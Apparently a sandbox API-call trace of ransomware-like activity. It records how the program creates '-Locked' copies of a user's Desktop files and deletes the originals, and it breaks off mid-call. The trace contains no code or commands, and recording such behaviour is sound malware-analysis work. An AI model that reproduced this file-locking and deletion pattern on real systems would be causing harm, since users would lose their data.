CloseHandle (hObject=0x480) returned 1 [0311.148] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked-Locked", lpFilePart=0x0) returned 0x3f [0311.148] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L3CXAN4c0b0rw2-.mkv-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l3cxan4c0b0rw2-.mkv-locked-locked")) returned 1 [0311.148] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked-Locked", lpFilePart=0x0) returned 0x3a [0311.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.148] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l_wfyu3ls.pptx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.149] GetFileType (hFile=0x480) returned 0x1 [0311.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.149] GetFileType (hFile=0x480) returned 0x1 [0311.150] CloseHandle (hObject=0x480) returned 1 [0311.151] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked", lpFilePart=0x0) returned 0x33 [0311.151] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l_wfyu3ls.pptx-locked")) returned 1 [0311.151] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x41 [0311.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.152] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l_wfyu3ls.pptx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.152] GetFileType (hFile=0x480) returned 0x1 [0311.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.152] GetFileType (hFile=0x480) returned 0x1 [0311.153] CloseHandle (hObject=0x480) returned 1 [0311.157] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked-Locked", lpFilePart=0x0) returned 0x3a [0311.163] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\L_wFYu3lS.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\l_wfyu3ls.pptx-locked-locked")) returned 1 [0311.164] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked-Locked", lpFilePart=0x0) returned 0x37 [0311.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.164] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\myzqdkf.mp3-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.164] GetFileType (hFile=0x480) returned 0x1 [0311.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.164] GetFileType (hFile=0x480) returned 0x1 [0311.166] CloseHandle (hObject=0x480) returned 1 [0311.166] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked", lpFilePart=0x0) returned 0x30 [0311.167] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\myzqdkf.mp3-locked")) returned 1 [0311.167] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3e [0311.167] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.167] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\myzqdkf.mp3-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.171] GetFileType (hFile=0x480) returned 0x1 [0311.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.171] GetFileType (hFile=0x480) returned 0x1 [0311.173] CloseHandle (hObject=0x480) returned 1 [0311.173] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked-Locked", lpFilePart=0x0) returned 0x37 [0311.173] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\MyZQDkF.mp3-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\myzqdkf.mp3-locked-locked")) returned 1 [0311.174] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked", lpFilePart=0x0) returned 0x44 [0311.174] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.174] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\nrkt5ni-9sno8stzm1p5.wav-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.174] GetFileType (hFile=0x480) returned 0x1 [0311.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.174] GetFileType (hFile=0x480) returned 0x1 [0311.176] CloseHandle (hObject=0x480) returned 1 [0311.176] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked", lpFilePart=0x0) returned 0x3d [0311.176] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\nrkt5ni-9sno8stzm1p5.wav-locked")) returned 1 [0311.177] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4b [0311.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.177] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\nrkt5ni-9sno8stzm1p5.wav-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.177] GetFileType (hFile=0x480) returned 0x1 [0311.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.177] GetFileType (hFile=0x480) returned 0x1 [0311.179] CloseHandle (hObject=0x480) returned 1 [0311.179] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked", lpFilePart=0x0) returned 0x44 [0311.179] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\nrkt5ni-9sno8stzm1p5.wav-locked-locked")) returned 1 [0311.180] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked-Locked", lpFilePart=0x0) returned 0x36 [0311.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.180] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\oqwytp.bmp-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.180] GetFileType (hFile=0x480) returned 0x1 [0311.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.180] GetFileType (hFile=0x480) returned 0x1 [0311.181] CloseHandle (hObject=0x480) returned 1 [0311.182] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked", lpFilePart=0x0) returned 0x2f [0311.182] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\oqwytp.bmp-locked")) returned 1 [0311.183] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3d [0311.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.183] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\oqwytp.bmp-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.183] GetFileType (hFile=0x480) returned 0x1 [0311.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.183] GetFileType (hFile=0x480) returned 0x1 [0311.185] CloseHandle (hObject=0x480) returned 1 [0311.185] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked-Locked", lpFilePart=0x0) returned 0x36 [0311.185] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\OqWYTp.bmp-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\oqwytp.bmp-locked-locked")) returned 1 [0311.186] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked-Locked", lpFilePart=0x0) returned 0x3a [0311.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.186] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\skbr_odto7.ppt-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.186] GetFileType (hFile=0x480) returned 0x1 [0311.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.186] GetFileType (hFile=0x480) returned 0x1 [0311.187] CloseHandle (hObject=0x480) returned 1 [0311.188] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked", lpFilePart=0x0) returned 0x33 [0311.188] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\skbr_odto7.ppt-locked")) returned 1 [0311.189] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked-Locked-Locked", lpFilePart=0x0) returned 0x41 [0311.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.189] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\skbr_odto7.ppt-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.189] GetFileType (hFile=0x480) returned 0x1 [0311.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.189] GetFileType (hFile=0x480) returned 0x1 [0311.191] CloseHandle (hObject=0x480) returned 1 [0311.191] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked-Locked", lpFilePart=0x0) returned 0x3a [0311.191] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SkBr_ODTO7.ppt-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\skbr_odto7.ppt-locked-locked")) returned 1 [0311.192] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked-Locked", lpFilePart=0x0) returned 0x34 [0311.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.192] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\soni.jpg-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.192] GetFileType (hFile=0x480) returned 0x1 [0311.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.192] GetFileType (hFile=0x480) returned 0x1 [0311.194] CloseHandle (hObject=0x480) returned 1 [0311.194] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked", lpFilePart=0x0) returned 0x2d [0311.194] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\soni.jpg-locked")) returned 1 [0311.196] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3b [0311.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.196] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\soni.jpg-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.197] GetFileType (hFile=0x480) returned 0x1 [0311.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.197] GetFileType (hFile=0x480) returned 0x1 [0311.199] CloseHandle (hObject=0x480) returned 1 [0311.200] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked-Locked", lpFilePart=0x0) returned 0x34 [0311.200] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\SoNi.jpg-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\soni.jpg-locked-locked")) returned 1 [0311.201] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked-Locked", lpFilePart=0x0) returned 0x37 [0311.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.201] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\stlrgmy.flv-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.202] GetFileType (hFile=0x480) returned 0x1 [0311.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.202] GetFileType (hFile=0x480) returned 0x1 [0311.213] CloseHandle (hObject=0x480) returned 1 [0311.213] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked", lpFilePart=0x0) returned 0x30 [0311.214] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\stlrgmy.flv-locked")) returned 1 [0311.215] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3e [0311.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.215] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\stlrgmy.flv-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.216] GetFileType (hFile=0x480) returned 0x1 [0311.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.216] GetFileType (hFile=0x480) returned 0x1 [0311.218] CloseHandle (hObject=0x480) returned 1 [0311.218] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked-Locked", lpFilePart=0x0) returned 0x37 [0311.218] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sTLRgmy.flv-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\stlrgmy.flv-locked-locked")) returned 1 [0311.219] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked-Locked", lpFilePart=0x0) returned 0x38 [0311.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.219] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tmhbbpcr.mp4-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.220] GetFileType (hFile=0x480) returned 0x1 [0311.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.220] GetFileType (hFile=0x480) returned 0x1 [0311.222] CloseHandle (hObject=0x480) returned 1 [0311.223] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked", lpFilePart=0x0) returned 0x31 [0311.223] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tmhbbpcr.mp4-locked")) returned 1 [0311.237] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3f [0311.237] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.237] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tmhbbpcr.mp4-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0311.241] GetFileType (hFile=0x480) returned 0x1 [0311.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c0) returned 1 [0311.241] GetFileType (hFile=0x480) returned 0x1 [0311.244] CloseHandle (hObject=0x480) returned 1 [0311.245] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked-Locked", lpFilePart=0x0) returned 0x38 [0311.245] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\tmhBBPCr.mp4-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tmhbbpcr.mp4-locked-locked")) returned 1 [0311.247] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked-Locked", lpFilePart=0x0) returned 0x40 [0311.247] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0c4) returned 1 [0311.247] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\TujlyxlbhAxVP9v1.mp4-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tujlyxlbhaxvp9v1.mp4-locked-locked"), dwDesiredAccess=0xc0000000, 